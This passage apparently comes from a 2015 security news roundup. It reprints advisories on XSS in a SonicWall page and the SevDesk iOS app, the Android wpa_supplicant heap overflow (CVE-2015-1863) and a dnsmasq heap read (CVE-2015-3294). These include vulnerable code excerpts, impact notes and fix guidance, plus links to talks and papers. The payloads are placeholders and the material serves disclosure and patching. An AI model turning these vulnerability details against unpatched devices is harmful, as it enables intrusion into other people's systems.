Cookie[__utma=227649090.564465250.1416863624.1416865480.1417100584.3; __utmc=227649090; __utmz=227649090.1416863624.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=227649090.|1=User%3AUnkown=Unknown=1; referreringDomain=; SonicwallReferreringDomain=70160000000jxw7; _ga=GA1.2.564465250.1416863624; s_fid=23E57A7F416D34BD-3112FD9D33A8F2CA; s_cc=true; mbox=check#true#1416865554|session#1416865493280-142580#1416867354|PC#1416865493280-142580.26_06#1418075095; s_nr=1416865503646; s_getval=backlink; s_ppv=marketing.sonicwall.com%2Fregister%2F69295; s_sq=%5B%5BB%5D%5D; s_c49=c%3Dus%26l%3Den%26s%3Dcorp; cidlid=%3A%3A; s_channelstack=%5B%5B'Referrers'%2C'1416865503950'%5D%5D; sessionTime=2014%2C10%2C24%2C22%2C45%2C3%2C950; s_hwp=null%7C%7Cnull%7C%7C24%3A11%3A2014%3A22%3A45%7C%7CN%7C%7CN%7C%7Cnull%7C%7C0%7C%7Cnull%7C%7Cnull%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; s_sv_sid=75828994935; s_sv_112_p1=1@11@s/15062&e/2; s_sv_112_s1=1@16@a//1416865504579; curUrl=macIpSpoofView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 1004=1; 1000=9; 777=1; __utmb=227649090.2.10.1417100584; __utmt=1; _gat=1]
Connection[keep-alive]
Response Header:
Server[SonicWALL]
Expires[-1]
Cache-Control[no-cache]
Content-Type[text/html; charset=UTF-8;]



-
Status: 200[OK]
GET https://cas.127.0.0.1:8080/[CLIENT-SIDE SCRIPT CODE EXECUTION!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[cas.127.0.0.1:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://cas.127.0.0.1:8080/macIpSpoofView.html?
mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3C[CLIENT-SIDE SCRIPT CODE INJECTION!]&searchSpoofIpDet=]

Cookie[__utma=227649090.564465250.1416863624.1416863624.1416865480.2; __utmc=227649090; __utmz=227649090.1416863624.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmv=227649090.|1=User%3AUnkown=Unknown=1; referreringDomain=; SonicwallReferreringDomain=70160000000jxw7; _ga=GA1.2.564465250.1416863624; s_fid=23E57A7F416D34BD-3112FD9D33A8F2CA;
s_cc=true; mbox=check#true#1416865554|session#1416865493280-142580#1416867354|PC#1416865493280-142580.26_06#1418075095; s_nr=1416865503646; s_getval=backlink;
s_ppv=marketing.sonicwall.com%2Fregister%2F69295; s_sq=%5B%5BB%5D%5D; s_c49=c%3Dus%26l%3Den%26s%3Dcorp; cidlid=%3A%3A; s_channelstack=%5B%5B'Referrers'%2C'1416865503950'%5D%5D;
sessionTime=2014%2C10%2C24%2C22%2C45%2C3%2C950; s_hwp=null%7C%7Cnull%7C%7C24%3A11%3A2014%3A22%3A45%7C%7CN%7C%7CN%7C%7Cnull%7C%7C0%7C%7Cnull%7C%7Cnull%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull;
s_sv_sid=75828994935; s_sv_112_p1=1@11@s/15062&e/2; s_sv_112_s1=1@16@a//1416865504579; curUrl=macIpSpoofView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 1004=1; 1000=9; 777=1]
Connection[keep-alive]
Response Header:
Server[SonicWALL]
Expires[-1]
Cache-Control[no-cache]
Content-Type[text/html;charset=UTF-8]


Reference(s):
https://cas.127.0.0.1:8080/
https://cas.127.0.0.1:8080/macIpSpoofView.html
https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the vulnerable searchSpoof and searchSpoofIpDet parameters.
Restrict the input values and encode the output context of macipspoofview.html to prevent client-side or application-side script code injection attacks.


Security Risk:
==============
The security risk of the cross site scripting web vulnerability in the macipspoofview.html file is estimated as medium. (CVSS 3.0)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

SevDesk v1.1 iOS - Persistent Dashboard Vulnerability

Document Title:
===============
SevDesk v1.1 iOS - Persistent Dashboard Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1311


Release Date:
=============
2015-04-23


Vulnerability Laboratory ID (VL-ID):
====================================
1311


Common Vulnerability Scoring System:
====================================
4.2


Product & Service Introduction:
===============================
Official app for mobile use of sevDesk. A product of SEVENIT GmbH.

Daily Backup
256bit SSL encryption
TÜV certified data center

Free version
No hidden costs
No minimum contract term

iPhone App
Runs in any browser
No installation required on the PC

Easy to use
Reduced to the essentials
Automated, where it is only possible

(Copy of the Vendor Homepage: https://sevdesk.de/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official SEVENIT GmbH SevDesk mobile application (api).


Vulnerability Disclosure Timeline:
==================================
2014-09-01: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-02: Vendor Notification (SevDesk Developer Team)
2015-04-23: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
SevenIT
Product: SevDesk - iOS Mobile Web Application (API) 1.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official SEVENIT Software GmbH sevDesk v1.1 iOS mobile web-application (api).
The vulnerability allows remote attackers or low privileged user accounts to inject their own malicious script code into the application-side of the
vulnerable web-application module or service.

The security vulnerability is located in the `firstname` value of the main sevDesk `Dashboard` application module & api. Remote attackers are able to
inject their own script code into the mobile dashboard through the api by manipulating the registration information in the client.

The script code executes after the injection on the application-side in the main mobile dashboard status list. When the test user account applies any
change to the account profile, the activity becomes visible; the context in which the information and details become visible is the location where the
persistently injected script code executes. The attack vector is persistent and the request method used to inject the code is POST.

The security risk of the persistent script code injection web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.2.
Exploitation of the persistent input validation web vulnerability requires a low privileged sevdesk user account with restricted access and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious sources and persistent
manipulation of affected or connected application modules (api).

Request Method(s):
[+] POST

Vulnerable Application(s):
[+] sevDesk v1.1 iOS

Vulnerable Module(s):
[+] Registration to SevDesk

Vulnerable Parameter(s):
[+] firstname (display name)

Affected Module(s):
[+] Dashboard Index Status List


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged application user account and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below.

1. Install the application on your iOS device (ipad, iphone)
2. Register a new account
3. Include your own malicious script code payload as the name value
4. Save the settings and open the Dashboard status listing
Note: After saving, the context is displayed by the mobile app api through the web database
5. The script code executes in the main status messages
6. The security vulnerability has been successfully reproduced in the mobile iOS application!


Picture(s):
../1.png
../2.png
../3.png


Solution - Fix & Patch:
=======================
The issue can be patched by securely parsing and encoding the user credentials on registration through the mobile application api.
Restrict the user input at registration and also parse the status listing in the main dashboard, which becomes visible after the malicious changes.


Security Risk:
==============
The security risk of the persistent mobile web vulnerability in the api is estimated as medium. (CVSS 4.2)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™


Ubuntu local privilege escalation

Visualizing a single null-byte heap overflow exploitation

When Phantasmal Phantasmagoria wrote The Malloc Malleficarum back in 2005 he exposed several ways of gaining control of an exploitation through corruption of the internal state of the libc memory allocator. Ten years later people are still exploring the possibilities offered by such complex data structures. In this article I will present how I solved a challenge from Plaid CTF 2015 and the tool I wrote in the process.

Phantasmal's paper addressed the patches libc developers made in response to earlier exploitation techniques. Some of the insights he presented are still relevant and people continue to go further, but new techniques have emerged. Project Zero gave a good example of this with The Poisoned NUL Byte, which they presented in 2014.

Quick fuzzing of the target reveals some memory errors

more here........http://wapiflapi.github.io/2015/04/22/single-null-byte-heap-overflow/

Android wpa_supplicant WLAN Direct remote buffer overflow

1. Advisory Information
Advisory URL: http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.p1ECc3&id=19
Date published: 2015-04-23
Date of last update: 2015-04-23

2. Vulnerability Information
Class: heap overflow
Impact: memory information leak and remote code execution
Remote Exploitable: Yes
Local Exploitable: No
CVE Name: CVE-2015-1863
Vulnerability Information and Patch: http://w1.fi/security/2015-1/

3. Vulnerability Description
  In Android, wpa_supplicant is designed as a "daemon" program that runs in the background and acts as the backend
component controlling the wireless connection. When the WLAN Direct function of wpa_supplicant is enabled, a malformed p2p
invitation type packet with a long ssid can trigger a heap overflow vulnerability. An attacker within the wireless signal
coverage of the device could launch a remote attack, gain access to the victim's android device and execute native code
with the corresponding user privileges (on android this is the wifi user). That user has permission to read the saved WIFI
passwords, change the network configuration and hijack all Wi-Fi traffic. Combined with a local privilege escalation
vulnerability, this allows an attacker to remotely control a host of victims, implant Trojans and install other low-level
implants.
4. Vulnerable Packages
Android 4/Android 5
wpa_supplicant 2.x
5. Credits
Smart hardware research group of Alibaba security team for discovering the vulnerability.
6. Technical Description
wpa_supplicant mallocs a p2p_device structure whose oper_ssid field is 0x20 bytes in size. In the p2p invitation
packet the size of the ssid field is described by one octet, so its maximum is 0xff. When the ssid is copied into the
oper_ssid field, the length is not checked. When the size of the ssid exceeds 0x20 bytes, it overflows other fields of the
p2p_device structure, and when it exceeds 0x40 bytes it overflows the heap structure.
In android version 5.1, the source is:
============ p2p_device structure (wpa_supplicant/p2p/p2p_i.h) ============
struct p2p_device {
        [……….]
        int oper_freq;
        u8 oper_ssid[32];               <----- fixed 0x20 bytes
        size_t oper_ssid_len;
        [……….]
        /**
         * go_neg_conf - GO Negotiation Confirmation frame
         */
        struct wpabuf *go_neg_conf;
        int sd_pending_bcast_queries;
};

============ p2p_add_device (wpa_supplicant/p2p/p2p.c) ============
int p2p_add_device(struct p2p_data *p2p, const u8 *addr, int freq,
                   struct os_reltime *rx_time, int level, const u8 *ies,
                   size_t ies_len, int scan_res)
{
        [……….]
        if (os_memcmp(addr, p2p_dev_addr, ETH_ALEN) != 0)
                os_memcpy(dev->interface_addr, addr, ETH_ALEN);
        if (msg.ssid &&
            (msg.ssid[1] != P2P_WILDCARD_SSID_LEN ||
             os_memcmp(msg.ssid + 2, P2P_WILDCARD_SSID, P2P_WILDCARD_SSID_LEN)
             != 0)) {
                os_memcpy(dev->oper_ssid, msg.ssid + 2, msg.ssid[1]);
                /* the destination buffer is 0x20 bytes, but the size comes from user input: buffer overflow */
                dev->oper_ssid_len = msg.ssid[1];
        }
        [……….]
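The missing bound is a comparison of the SSID length byte against sizeof(dev->oper_ssid). The code below is an added example, not wpa_supplicant's own source: it reduces struct p2p_device to the fields the bug touches, walks the IE blob with a truncation check, and refuses an SSID that does not fit, using constructed frames.

```c
/* Added example (not wpa_supplicant source): a reduced model of the SSID
 * copy in p2p_add_device() shown above, with the length bound that the
 * vulnerable code lacks. struct p2p_device is cut down to the fields the
 * bug touches; the IE blobs in demo() are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define WLAN_EID_SSID         0          /* 802.11 element ID of the SSID */
#define P2P_WILDCARD_SSID     "DIRECT-"  /* wildcard SSID as defined by wpa_supplicant */
#define P2P_WILDCARD_SSID_LEN 7

struct p2p_device {
    int     oper_freq;
    uint8_t oper_ssid[32];      /* fixed 0x20 bytes, as in p2p_i.h */
    size_t  oper_ssid_len;
    void   *go_neg_conf;        /* a pointer that follows oper_ssid in the real struct */
};

/* Locate the SSID element in an IE blob ([id][len][data] triples), refusing
 * any element whose length byte claims more data than the frame carries. */
const uint8_t *find_ssid_ie(const uint8_t *ies, size_t ies_len)
{
    size_t pos = 0;
    while (pos + 2 <= ies_len) {
        uint8_t id = ies[pos], len = ies[pos + 1];
        if (pos + 2 + len > ies_len)
            return NULL;                /* truncated element */
        if (id == WLAN_EID_SSID)
            return ies + pos;
        pos += 2 + len;
    }
    return NULL;
}

/* Bounded version of the copy in p2p_add_device().
 * Returns 1 when the SSID was copied, 0 when there is no SSID or it is the
 * wildcard (skipped, as upstream does), -1 when the length byte exceeds
 * sizeof(dev->oper_ssid): the case the original code copied anyway. */
int set_oper_ssid(struct p2p_device *dev, const uint8_t *ies, size_t ies_len)
{
    const uint8_t *ssid = find_ssid_ie(ies, ies_len);
    if (!ssid)
        return 0;
    if (ssid[1] == P2P_WILDCARD_SSID_LEN &&
        memcmp(ssid + 2, P2P_WILDCARD_SSID, P2P_WILDCARD_SSID_LEN) == 0)
        return 0;
    if (ssid[1] > sizeof(dev->oper_ssid))
        return -1;                      /* ssid[1] ranges 0..255, buffer holds 32 */
    memcpy(dev->oper_ssid, ssid + 2, ssid[1]);
    dev->oper_ssid_len = ssid[1];
    return 1;
}

/* Three constructed frames: a normal SSID, a 200-byte SSID of the kind that
 * overran oper_ssid[] and the fields behind it, and a truncated element.
 * Returns 1 when every case is handled as expected. */
int demo(void)
{
    struct p2p_device dev;
    uint8_t normal[] = { WLAN_EID_SSID, 9, 'D','I','R','E','C','T','-','a','b' };
    uint8_t big[2 + 200];
    uint8_t truncated[] = { WLAN_EID_SSID, 40, 'x' };
    int r_normal, r_big, r_trunc;

    memset(&dev, 0, sizeof dev);
    memset(big, 'A', sizeof big);
    big[0] = WLAN_EID_SSID;
    big[1] = 200;
    r_normal = set_oper_ssid(&dev, normal, sizeof normal);
    r_big    = set_oper_ssid(&dev, big, sizeof big);
    r_trunc  = set_oper_ssid(&dev, truncated, sizeof truncated);
    printf("normal=%d oversized=%d truncated=%d oper_ssid_len=%zu go_neg_conf=%p\n",
           r_normal, r_big, r_trunc, dev.oper_ssid_len, dev.go_neg_conf);
    return r_normal == 1 && r_big == -1 && r_trunc == 0 &&
           dev.oper_ssid_len == 9 && dev.go_neg_conf == NULL;
}
```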
7. Vulnerability Impact Assessment:
1) Affected products: all devices running android versions below 5.1
2) Exploitability in the default configuration: although many android devices enable WLAN Direct only when the user
enters the WLAN Direct UI, we found that some models from well-known mobile phone manufacturers (such as Xiaomi, Huawei)
enable WLAN Direct by default. Even if the user never entered the WLAN Direct UI, the attacker can initiate a WLAN Direct
connection and trigger this vulnerability without user interaction. However, the attacker needs to know the WLAN Direct
MAC address. That address is the MAC address of the user's device with the first byte ORed with 2, and the device's MAC
address is easily acquired with a WIFI packet sniffer, so the WLAN Direct MAC address can be calculated: for example, if
the user device MAC address is 14:12:34:56:78:90, the WLAN Direct MAC address is 16:12:34:56:78:90. This means that on
some phone models, simply turning on the WIFI service is enough to be exposed to this attack.
  Other models, which do not enable WLAN Direct by default, still need attention, because a lot of file transfer software
uses the WLAN Direct feature and will enable it. Once enabled, the feature stays enabled even after the user exits the
WLAN Direct UI, until the device reboots or WIFI is restarted. During this time the device is affected and can be attacked
remotely.
3) Impact
This vulnerability can leak information, and the leaked information can be used with ROP to bypass ASLR and DEP. On
successful exploitation, attackers can execute native code with wifi user permissions, which allow changing the wifi
configuration and hijacking network traffic.
Because the vulnerability is exploitable remotely, when combined with a local privilege escalation vulnerability
attackers can implant trojans without physically touching the victim's device.
So this vulnerability is high risk, especially for devices with WLAN Direct enabled by default.
8. Poc and Coredump
See Advisory URL: http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.p1ECc3&id=19
9. Report Timeline
2015-4-3: vulnerability report sent to the android security team
2015-4-8: android security team acknowledges the vulnerability and forwards it to the wpa_supplicant maintainer
2015-4-8: wpa_supplicant maintainer acknowledges
2015-4-13: wpa_supplicant maintainer acknowledges the timeline for releasing a fix
2015-4-22: wpa_supplicant maintainer publishes the fix and security advisory
2015-4-23: this advisory is published

Dnsmasq 2.72 Unchecked returned value

Dnsmasq provides network infrastructure for small networks: DNS, DHCP, router advertisement and network boot. (Source: http://www.thekelleys.org.uk/dnsmasq/doc.html)

"Dnsmasq 2.72 Unchecked returned value"

Description
------------------------------------------------------------
Dnsmasq does not properly check the return value of the setup_reply()
function called during a tcp connection (by the tcp_request() function).
This return value is then used as a size argument in a function which writes
data on the client's connection. This may lead, upon successful
exploitation, to reading the heap memory of dnsmasq.

In more detail:
Function tcp_request() calls setup_reply() and the returned value is used as
a size argument in a write function.

m = setup_reply(header, (unsigned int)size, addrp, flags,
                daemon->local_ttl);
read_write(confd, packet, m + sizeof(u16), 0);

The m variable is determined by subtracting the header pointer from the
return value of skip_questions(). The return value of skip_questions() is
not checked for an error (NULL), so the negative value of the pointer
(-header) may be returned.

size_t setup_reply(struct dns_header *header, size_t qlen,
                   struct all_addr *addrp, unsigned int flags, unsigned long ttl)
{
        unsigned char *p = skip_questions(header, qlen);
        return p - (unsigned char *)header;
}

read_write checks whether the size argument is positive. On a 32 bit system
size_t m is 4 bytes and read_write will exit immediately. On a 64 bit system
size_t m is 8 bytes and the value may turn positive if the sign bit of the
32 bit value is 0.

If m is less than 0xffffffff80000000, dnsmasq can be exploited by a
potential attacker who will remotely read dnsmasq's heap. If the above
condition is not met, dnsmasq exits properly.
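The width argument above is easier to follow with the arithmetic written out. The following is an added example, not dnsmasq's code: it models the unchecked pointer subtraction in setup_reply(), the conversion to read_write()'s int size parameter, and a checked variant, with addresses as plain uint64_t values (the two header addresses are constructed).

```c
/* Added example (not dnsmasq source): models the arithmetic behind
 * CVE-2015-3294. setup_reply() returns `p - (unsigned char *)header` as a
 * size_t; when skip_questions() fails and p is NULL that is -header wrapped
 * to 64 bits, and read_write() then receives it through an int parameter.
 * Addresses are plain uint64_t values here so the arithmetic is defined and
 * the example runs on any host. The sample addresses are constructed. */
#include <stdint.h>
#include <stdio.h>

/* Mirrors setup_reply() with no NULL check: p == 0 yields 2^64 - header. */
uint64_t unchecked_reply_len(uint64_t header, uint64_t p)
{
    return p - header;
}

/* Mirrors the call read_write(confd, packet, m + sizeof(u16), 0): the 64-bit
 * length is converted to read_write()'s int parameter, keeping only the low
 * 32 bits. read_write() refuses a negative size, so the sign of this value
 * decides whether the huge length is rejected or used as a byte count. */
int32_t as_read_write_size(uint64_t m)
{
    return (int32_t)(uint32_t)(m + sizeof(uint16_t));
}

/* A checked version: a failed parse or a pointer outside the qlen-byte
 * query buffer is reported as -1 instead of becoming a length. */
int64_t checked_reply_len(uint64_t header, uint64_t p, uint64_t qlen)
{
    if (p == 0 || p < header || p - header > qlen)
        return -1;
    return (int64_t)(p - header);
}

/* Walk two constructed header addresses through both paths: the first has
 * its low 32 bits above 0x80000000, so the truncated size comes out
 * positive; the second does not, so read_write() would reject it. */
int main(void)
{
    const uint64_t addrs[] = { 0x7f0090000000ULL, 0x55555555a000ULL };
    size_t i;
    for (i = 0; i < 2; i++) {
        uint64_t m = unchecked_reply_len(addrs[i], 0);
        int32_t sz = as_read_write_size(m);
        printf("header=%#llx m=%#llx read_write size=%d -> %s\n",
               (unsigned long long)addrs[i], (unsigned long long)m, (int)sz,
               sz > 0 ? "heap bytes written to client" : "read_write rejects");
        printf("  checked: %lld\n", (long long)checked_reply_len(addrs[i], 0, 512));
    }
    return 0;
}
```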

Researcher
------------------------------------------------------------
Nick Sampanis (n.sampanis[a t]obrela[do t]com)


Vulnerability
------------------------------------------------------------
Unchecked return value CVE-2015-3294

Identification date:
------------------------------------------------------------
07/04/2015 - 09/04/2015

Solution - fix & patch
------------------------------------------------------------
Please download dnsmasq-2.73rc4.tar.gz

Reference:
------------------------------------------------------------
http://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2015q2/009382.html
https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1502/


Lack of Android Updates Come Under FTC Scrutiny?

Last week, a rather interesting complaint was filed before the Federal Trade Commission. In a 16-page complaint, the American Civil Liberties Union described the lack of updates for many Android devices as “unfair and deceptive business practices”. The complaint went on to ask the respondents (the top four wireless carriers in the United States) to let customers with unpatched (and vulnerable) devices out of their contracts early.

more here........http://blog.trendmicro.com/trendlabs-security-intelligence/lack-of-android-updates-to-come-under-ftc-scrutiny/

New Threat Report Via F-Secure

Some Recent RSA 2015 Conference Uploaded Video's

Quantitative Security: Using Moneyball Techniques to Defend Corporate Networks
In “Moneyball,” Michael Lewis describes how a sports team used data analytics to field the best possible players. Can this quantitative approach help a company achieve the highest possible level of security? Amit Mital will discuss how advanced data mining on massive amounts of security intelligence will help organizations thwart even the most complex attacks on their systems and information. more here...........http://www.rsaconference.com/media/quantitative-security-using-moneyball-techniques-to-defend-corporate-networks


Talking ’bout My Next Generation
Who would’ve thought a 50-year-old song would’ve been the perfect descriptor for how cyber security practitioners sometimes feel viewed by the rest of the world? In the immortal words of The Who, “People try to put us down.” Come hear about what’s next for cyber security. The answer might surprise you and “cause a big sensation.” more here......http://www.rsaconference.com/media/talking-bout-my-next-generation


Welcome to the New School of Cyber Defense
The old school of cyber defense emphasized securing infrastructure and restricting data flows. But data needs to run freely to power our organizations. The new school of cyber defense calls for security that is agile and intelligent. It emphasizes protecting the interactions between our users, our applications and our data. The world has changed, and we must change the way we secure it. more here....http://www.rsaconference.com/media/welcome-to-the-new-school-of-cyber-defense


Pass-the-Hash II
Abbreviated version of Pass-the-Hash II: The Wrath of Hardware with Nathan Ide, Principal Development Lead, Microsoft. more here.........https://www.youtube.com/watch?v=K21J5X4HO04


Paper: Breaking the Rabin-Williams digital signature system implementation in the Crypto++ library

This paper describes a bug in the implementation of the Rabin-Williams
digital signature in the Crypto++ framework. The bug lies in the misuse
of the blinding technique that is meant to prevent timing attacks on the
digital signature implementation, but which ultimately makes it possible
to recover the private key from only two different signatures of the same
message. The CVE identifier of the issue is CVE-2015-2141.


User-defined Storage-based Covert Communication
